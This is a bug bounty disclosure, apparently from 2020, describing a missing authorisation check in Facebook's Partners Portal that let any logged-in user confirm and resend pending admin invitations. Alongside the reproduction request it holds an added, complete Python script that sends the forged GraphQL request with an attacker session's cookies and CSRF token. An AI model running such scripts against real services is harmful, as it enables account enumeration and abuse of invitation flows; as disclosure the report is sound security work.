Description
This bug allowed an attacker to resend the invitation email to a user whom an admin had added to a Partners Portal account. Because the resend endpoint did not check that the caller had any role on the target Partner account, it doubled as an oracle: it could confirm whether an admin had invited a specific email address or user, and if so resend that invitation (with its invitation link) without the attacker having any permission on the Partner account.
Reproduction Steps
Using the attacker account:
1) Send a POST request to https://www.facebook.com/api/graphql/ with the attacker's valid session cookies and these parameters in the form-encoded body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=2757598104258915&
variables={"partner_id":XXXXXXX,"portal_type":"fbs","email":"YYYYYYY"}
where CSRF_TOKEN is the fb_dtsg value of the attacker's own session, XXXXXXX is the partner_id of the target Partner account, YYYYYYY is the pending (invited) email address, and "fbs" is the portal type of the Partner account.
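The request above, written out as a small reproduction script. This is an added example, not code from the original report: it builds the form body exactly as described (the variables field is a JSON string that is URL-encoded alongside the other fields), attaches the attacker session's cookies and fb_dtsg, and returns the raw decoded response for inspection. The report does not document the response format, so the script hard-codes no success oracle; the environment variable names, the CLI argument layout and the sample values in the usage are assumptions.

```python
import json
import os
import sys
import urllib.parse
import urllib.request

GRAPHQL_URL = "https://www.facebook.com/api/graphql/"
DOC_ID = "2757598104258915"  # doc_id of the resend-invitation mutation, as given in the report


def build_resend_body(partner_id, email, fb_dtsg, portal_type="fbs"):
    """Build the form-encoded POST body from the report.

    `variables` travels as a JSON string inside the form body, so it is
    serialised with json.dumps (compact separators) and then URL-encoded
    together with the other fields. partner_id is numeric in the report
    (XXXXXXX carries no quotes), so it is emitted as a JSON number.
    """
    variables = {"partner_id": int(partner_id), "portal_type": portal_type, "email": email}
    fields = [
        ("__a", "1"),
        ("fb_dtsg", fb_dtsg),  # CSRF token of the attacker's own session
        ("doc_id", DOC_ID),
        ("variables", json.dumps(variables, separators=(",", ":"))),
    ]
    return urllib.parse.urlencode(fields)


def decode_body(body):
    """Inverse of build_resend_body; used to check that the encoding round-trips."""
    fields = dict(urllib.parse.parse_qsl(body))
    fields["variables"] = json.loads(fields["variables"])
    return fields


def build_request(partner_id, email, fb_dtsg, cookie, portal_type="fbs"):
    """Assemble the urllib Request without sending it. `cookie` is the attacker session's Cookie header."""
    body = build_resend_body(partner_id, email, fb_dtsg, portal_type).encode()
    return urllib.request.Request(
        GRAPHQL_URL,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": cookie,
        },
    )


def resend_invitation(partner_id, email, fb_dtsg, cookie, portal_type="fbs", timeout=15):
    """Send the request and return the decoded JSON response.

    No success/failure oracle is hard-coded: the report does not describe the
    response shape. Compare the response for an address you know is pending
    against one you know is not.
    """
    req = build_request(partner_id, email, fb_dtsg, cookie, portal_type)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        raw = resp.read().decode("utf-8", "replace")
    # Facebook's __a=1 responses commonly carry a "for (;;);" anti-JSON-hijacking
    # prefix; strip it if present so the body parses as JSON.
    prefix = "for (;;);"
    if raw.startswith(prefix):
        raw = raw[len(prefix):]
    return json.loads(raw)


if __name__ == "__main__":
    # Assumed invocation: FB_COOKIE and FB_DTSG come from the attacker-controlled
    # test account; partner_id and email are the target values from the report.
    #   FB_COOKIE='c_user=...; xs=...' FB_DTSG='...' python resend.py 1234567 pending@example.com
    if len(sys.argv) != 3:
        sys.exit("usage: resend.py <partner_id> <email>")
    result = resend_invitation(
        sys.argv[1], sys.argv[2], os.environ["FB_DTSG"], os.environ["FB_COOKIE"]
    )
    print(json.dumps(result, indent=2))
```

Run it only from an account that holds no role on the target Partner account and only against an account you are authorised to test; a 200 with the invitation resent from such a caller is exactly the missing authorisation check the report describes.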
Impact
This could be used to determine which admin email addresses had been added to a Partners Portal account and to resend new invitations to those addresses, without the attacker having any permission on or access to the account.
Timeline
Feb 5, 2020 — Report sent
Feb 20, 2020 — Acknowledged by Facebook
Mar 10, 2020 — Fixed by Facebook
Mar 12, 2020 — $500 bounty awarded by Facebook